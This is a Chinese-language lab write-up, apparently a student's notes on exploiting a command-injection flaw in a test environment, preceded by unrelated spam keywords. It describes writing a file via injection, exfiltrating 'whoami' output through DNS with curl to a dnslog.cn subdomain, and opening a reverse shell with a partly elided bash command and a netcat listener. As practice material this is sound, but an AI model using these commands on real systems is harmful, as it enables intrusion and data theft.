受欢迎的锦州网站建设,开发一套软件app,wordpress主题残留,提升学历报考什么专业比较好任务一#xff1a; 复现环境中的命令注入漏洞。 任务二#xff1a; 利用命令注入执行whoami#xff0c;使用DNS外带技术获取结果 任务三#xff1a;使用反弹shell#xff0c;将漏洞环境中的shell反弹到宿主机或者vps服务器。
任务一#xff1a; 1.搭建好环境 2.先去了…任务一 复现环境中的命令注入漏洞。 任务二 利用命令注入执行whoami使用DNS外带技术获取结果 任务三使用反弹shell将漏洞环境中的shell反弹到宿主机或者vps服务器。
任务一 1.搭建好环境 2.先去了解一下这个网站的功能 3.首先查看存在的metric发现在这里是0 4.我们写入一个metric首先利用burpsuite进行抓包然后用post请求添加请求体加入metric然后我们再次查看metrics发现我们已经成功写入一个metric。 5.然后进行代码执行漏洞在tmp下创建一个success文件得到回显 6.然后进入容器中查看一定要查看创建的文件路径其他的包含任何的都不是因为这个找了好久好久其实很早就做出来了还以为做错了无语死了。 任务二 1.直接把输出的whoami重定向到1.txt文件里面中间要用%20作为空格不然会失败因为这个卡了好久看到burpsuite的颜色那里不对了 2.查看1.txt文件发现我是root。
3.如果是利用DNS外带技术获得结果的话 首先登入dnslog.cn然后点击get subdomain获得专属的子域名。 4.然后使用curl $(whoami).子域名然后上面回显的时候出现了root.子域名得到这里有一个问题最开始用的ping一直没ping通不知道为啥 任务三 1.用bash -c “bash -i ·········“ 2.这里试了很久自己的反弹shell都不成功然后试了很多次先是把端口打开了用ufw添加端口 ufw allow 端口然后把自己的nc变成了 nc -lvp 端口然后再sec一次反弹成功了。